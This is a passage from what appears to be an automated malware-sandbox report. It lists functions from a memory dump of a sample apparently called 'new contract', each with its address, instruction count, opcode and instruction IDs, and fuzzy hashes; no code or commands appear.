                                                                                                                                                                            • Instruction Fuzzy Hash: 35F089337515119BD3319A4DCC80F16B769EFD5A60F9B0169A6049B360C765EC02CFD0
                                                                                                                                                                            Function 016AC89D Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ba071a6a2772f469a778141787e08d1b2fe150a32fc305c82af0806e5eafa3c6
                                                                                                                                                                            • Instruction ID: c55d5164d93735a7c0db3d2e8082938231a5e3a3e25c2a7cf69cf00438b71716
                                                                                                                                                                            • Opcode Fuzzy Hash: ba071a6a2772f469a778141787e08d1b2fe150a32fc305c82af0806e5eafa3c6
                                                                                                                                                                            • Instruction Fuzzy Hash: 8EF0C2716093049FC310EF28C945A1BBBE4FF99710F80465EB898DB394EA34ED01CB96
                                                                                                                                                                            Function 01650854 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                            • Instruction ID: 930f54c2a66d26ae36a9dc6771e094602c0d9e0d0a97ed9938cba09b0e72e7af
                                                                                                                                                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                            • Instruction Fuzzy Hash: F9F0E972610204AFE714DF25CC01F56B7EAEF98354F258078A945D72A4FBB0ED01C654
                                                                                                                                                                            Function 016AC912 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6c55dc9dfb0cee85491d0cce66333e7be753ecfa805c1dd8c35105e1f38a0a1e
                                                                                                                                                                            • Instruction ID: 9e82741e926c5b5e3a7a776cbd6394de223318bfe4b10f575769edde95eb3222
                                                                                                                                                                            • Opcode Fuzzy Hash: 6c55dc9dfb0cee85491d0cce66333e7be753ecfa805c1dd8c35105e1f38a0a1e
                                                                                                                                                                            • Instruction Fuzzy Hash: 22F0C270A0020DDFCB04EF69C915A9EB7B4FF18300F008059B805EB385DA38EE01CB54
                                                                                                                                                                            Function 016247FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 10607765637c9d97cc29ff9bade75362de4e7cfeb0277b38819b64ecf0f38de9
                                                                                                                                                                            • Instruction ID: 698eb4e9b96ebea5e116dea2cd2ecbcfb0a2e103f1834c7b882b442aadcf041e
                                                                                                                                                                            • Opcode Fuzzy Hash: 10607765637c9d97cc29ff9bade75362de4e7cfeb0277b38819b64ecf0f38de9
                                                                                                                                                                            • Instruction Fuzzy Hash: 8CF09031926EF19FE7228B5CCC44BA27FD89B01660F0B496AD94987602CFACD880CE51
                                                                                                                                                                            Function 016E0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d0853933235363aa4882fc5045dac283a1b9a6c254dd8f8b343dbe0ade3859d9
                                                                                                                                                                            • Instruction ID: 733e76ff19b44fb3b552ea1d2825c751e581446df354bc337266fc74e18b66d8
                                                                                                                                                                            • Opcode Fuzzy Hash: d0853933235363aa4882fc5045dac283a1b9a6c254dd8f8b343dbe0ade3859d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 3FF0A76691B68117CF326B6CBC583D17BA7A752124F1A558DF4A15F345C6F4C483C324
                                                                                                                                                                            Function 0165C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fe34a2d478a1b269358a82b2853a6bf2f82624378efba4d5c655dc63fcbdcb50
                                                                                                                                                                            • Instruction ID: 3cef6cb224e71676a9bfc13c87ffde5e85c3ff35f414d4fcf3d020b049196738
                                                                                                                                                                            • Opcode Fuzzy Hash: fe34a2d478a1b269358a82b2853a6bf2f82624378efba4d5c655dc63fcbdcb50
                                                                                                                                                                            • Instruction Fuzzy Hash: 15F0E2755117719FE3A29B1CCD48B517BDCAB41BA0F099429DD0687612C764EA81CA70
                                                                                                                                                                            Function 01662619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                            • Instruction ID: 3f7da2704c4d5ae72b1de4b6da9bd4ffd69d3465c20ca1d29d910295a66e2a90
                                                                                                                                                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                            • Instruction Fuzzy Hash: 55E0D8323006012BE7119E598CD0F47776FDFD2B10F04007DB9049F252CAE2DC0983A8
                                                                                                                                                                            Function 016B6030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                            • Instruction ID: d3e96b3e705f63f017eb404f7e9c09676ab13511516762a83d44627e6159026f
                                                                                                                                                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 28F06572104204DFE3218F0ADE84FA2B7F9EB55364F45C029E6099B661D379EC80CFA4
                                                                                                                                                                            Function 01620710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                            • Instruction ID: 881ccaf08e2ef839d2d7ae0765ff0bc0409d21ba975088340e0d50e4e29326f6
                                                                                                                                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                            • Instruction Fuzzy Hash: 16F0ED7A204B559BEB16CF19D840AE57BA9FB49360F000098F8428B301EB36E982CF94
                                                                                                                                                                            Function 016549D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                            • Instruction ID: 4df9ede5390e65404249999bd9934e76976aee7c1311d28824b74e3eb5a32a5a
                                                                                                                                                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                            • Instruction Fuzzy Hash: D7E0D832244145ABD3E15A598C00B6677A6DBD07A0F150469EE098B258FF70DCC1C7EC
                                                                                                                                                                            Function 016F4164 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8b288d3eeada1933846ac224ed66ffc5258121295757d7229f2d69c600c49e9a
                                                                                                                                                                            • Instruction ID: 9718024d68a3209152209cb850f9be65aa120c71c8e2ab033a4b42ecbcbe924f
                                                                                                                                                                            • Opcode Fuzzy Hash: 8b288d3eeada1933846ac224ed66ffc5258121295757d7229f2d69c600c49e9a
                                                                                                                                                                            • Instruction Fuzzy Hash: 99F02B31A259918FE772D72CDE80F6377E0AF10631F0A055CD5008BF16CB24DC40C650
                                                                                                                                                                            Function 016C678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                            • Instruction ID: 4fe90ff62436bd33af92e3c0a0d88881b458894c8ab1e8b9e4ad46055dfb9a7f
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                            • Instruction Fuzzy Hash: 51E0DF32A00110BBDB21A799CD01FAABEADDF90EA0F050098BA02E7290E530DE00C6A4
                                                                                                                                                                            Function 016F08C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                            • Instruction ID: c22609b2e536bf243d7121ebd321e2a53714abf83469fcd2a372b1cf1c150a16
                                                                                                                                                                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                            • Instruction Fuzzy Hash: 79E09B316403508BCF258A1DC941A53B7EEDF95661F16806DEA1547713C331F843C6D0
                                                                                                                                                                            Function 016225E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: f268014f5b36dd47205359f7be8fc84b7b9aa6172b175031e908054a826666ec
                                                                                                                                                                            • Instruction ID: ac89d9ff6d4360a035e89b91db0c607bc7769fc531e1fbe000be121a3dbb5944
                                                                                                                                                                            • Opcode Fuzzy Hash: f268014f5b36dd47205359f7be8fc84b7b9aa6172b175031e908054a826666ec
                                                                                                                                                                            • Instruction Fuzzy Hash: DFE092721009649BC321BB2ADD11F8A779BEBA0364F01451DF11557190CB34A810CB88
                                                                                                                                                                            Function 016DA456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                            • Instruction ID: 11075065e1952e5a71b727dee611c90a3d2445752fccacb43a72d6b9d5f571e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                            • Instruction Fuzzy Hash: 9EE09231411611DFE7326F6ACC48B527BE6FF90711F148C2CA096026B0C77598C0CA84
                                                                                                                                                                            Function 016A4000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                            • Instruction ID: 3e54f2af64bcba3538ff31bcdac1f988267824f8cb2536bf98f42b7b8837fced
                                                                                                                                                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                            • Instruction Fuzzy Hash: C9E0C2343403058FE715CF19C840B627BB6BFD5A10F68C068A9488F305EB72E842DB50
                                                                                                                                                                            Function 0161823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                            • Instruction ID: 8bd124ecb3fd4c40624c7c9645de8e39823c2930c51d04a079230b39bd17d2d5
                                                                                                                                                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                            • Instruction Fuzzy Hash: 2AE0C231000A10EFDB332F16DC10F9176AAFF94B10F24882DE081171A887B4AC82CB88
                                                                                                                                                                            Function 01622050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1dc954f8d7f76370de5ca63e9d7873f68480679358ddafcd3c04e67fab172053
                                                                                                                                                                            • Instruction ID: 5be32a6d9f4c4cd01f49a0650df9767827579cad59d1330ae1e4a356a68a6b4d
                                                                                                                                                                            • Opcode Fuzzy Hash: 1dc954f8d7f76370de5ca63e9d7873f68480679358ddafcd3c04e67fab172053
                                                                                                                                                                            • Instruction Fuzzy Hash: BCE0C2332018606BC321FB5DDD10F4A739FEFA4370F014229F15187690CA64AC00CB98
                                                                                                                                                                            Function 01676AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                            • Instruction ID: 71672e3dd4ff03d6310fdac111b6c7eaa09e0f07bb39de863a608dd33b25b281
                                                                                                                                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                            • Instruction Fuzzy Hash: 95D05E36511A50AFD3329F1BEE00C13BBF9FBC4A10705062EA54683A20C770AC06CBA0
                                                                                                                                                                            Function 0165E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                            • Instruction ID: 6b39d9ed5fece23d79bc538b520984440872c2af2e3942d0866b4facff303685
                                                                                                                                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                            • Instruction Fuzzy Hash: C8D0A932214620ABDB32AA1CFC00FC333E9BB88720F06049DB008C7250C364AC81CA88
                                                                                                                                                                            Function 0169E908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                            • Instruction ID: 261ca165073b70a64b38ccfc00219d2c4e8ec5d45258915e882e66f3dc6c8076
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                            • Instruction Fuzzy Hash: 65E0EC359506849BDF12DF59CA40F5ABBB9BB94B40F150058E1485B760C729A901CB40
                                                                                                                                                                            Function 0161A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                            • Instruction ID: 789f5f1680e15a080f92ed7b80784af8b162c92997de546153101606f2931d68
                                                                                                                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                            • Instruction Fuzzy Hash: 00D022322130B093CB2856956D00F636906ABC0A95F0E002C340AD3A04C1088C43C2E0
                                                                                                                                                                            Function 0165A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                            • Instruction ID: b74b561ed14007ae4850f22878b33bac0c054c025650e2c380f219e9374e2e5b
                                                                                                                                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                            • Instruction Fuzzy Hash: F8D012371D054DBBCB119F66DC01F957BA9E7A4BA0F444020B504875A0C63AE950D584
                                                                                                                                                                            Function 0165CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8402c59f4b9b08bf17d47a4cee71184ed920c68a131fac3b0b09881a8816bcd9
                                                                                                                                                                            • Instruction ID: a404c57320229bc4e9c0831339156d6dda36f20859e8805bed6b6b2b1de2793f
                                                                                                                                                                            • Opcode Fuzzy Hash: 8402c59f4b9b08bf17d47a4cee71184ed920c68a131fac3b0b09881a8816bcd9
                                                                                                                                                                            • Instruction Fuzzy Hash: 90D092356566069BDF6ADB59CE10A6A7ABDEF64B41F4000ACEA0192620E329E8128A50
                                                                                                                                                                            Function 016302A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                            • Instruction ID: 60e1f7bb0ddddfb67f89f237bdc3a8b8a894f14d7ec525b15cdb0958f99f622a
                                                                                                                                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                            • Instruction Fuzzy Hash: 15D0C935212E80CFD61BCB0CC9A4F1533A8FB84B44F814490F501CBB22DB6CD944CA00
                                                                                                                                                                            Function 0165C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                            • Instruction ID: 8d1713207b9afe39a1118f65207fb4f56a429ccc5e1fe7d6ad05e7a799aab82a
                                                                                                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                            • Instruction Fuzzy Hash: F4C01232290648AFC712AA99CD01F027BAAEBA8B40F000021F2048B670C635E820EA88
                                                                                                                                                                            Function 01640310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
